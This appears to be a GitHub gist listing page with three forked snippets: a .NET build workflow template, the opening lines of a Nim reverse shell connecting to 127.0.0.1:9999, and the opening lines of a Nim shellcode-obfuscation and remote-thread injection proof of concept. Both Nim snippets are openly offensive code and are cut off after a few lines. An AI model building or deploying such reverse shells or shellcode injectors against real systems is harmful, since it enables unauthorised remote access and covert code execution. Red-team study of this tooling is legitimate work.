Skip to content

Instantly share code, notes, and snippets.

@goproslowyo
goproslowyo / dotnet.yml
Created July 30, 2022 20:38 — forked from mttaggart/dotnet.yml
.NET Actions Build
# This is a template GitHub Action YAML file for building .NET projects.
# Handy for forking .NET assembly projects and building easily without VS.
# Make sure to replace "MyAssembly" with the name of the project!
name: .NET
on:
push:
branches: [ main ]
pull_request:
branches: [ main ]
@goproslowyo
goproslowyo / nimrs.nim
Last active November 4, 2021 00:44 — forked from mttaggart/nimrs.nim
A simple reverse shell written in Nim
import net
import osproc
import strformat
# Create Socket
let port = 9999
let address = "127.0.0.1"
let sock = newSocket()
# Connect to listener
@goproslowyo
goproslowyo / nimterpreter.nim
Created September 30, 2021 20:42 — forked from mttaggart/nimterpreter.nim
A simple PoC for obfuscating shellcode in Nim
# With special thanks to byt3bl33d3r for Offensive Nim!
import winim/lean
import osproc
import base64
import sequtils
import strutils
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
let tProcess = startProcess("notepad.exe")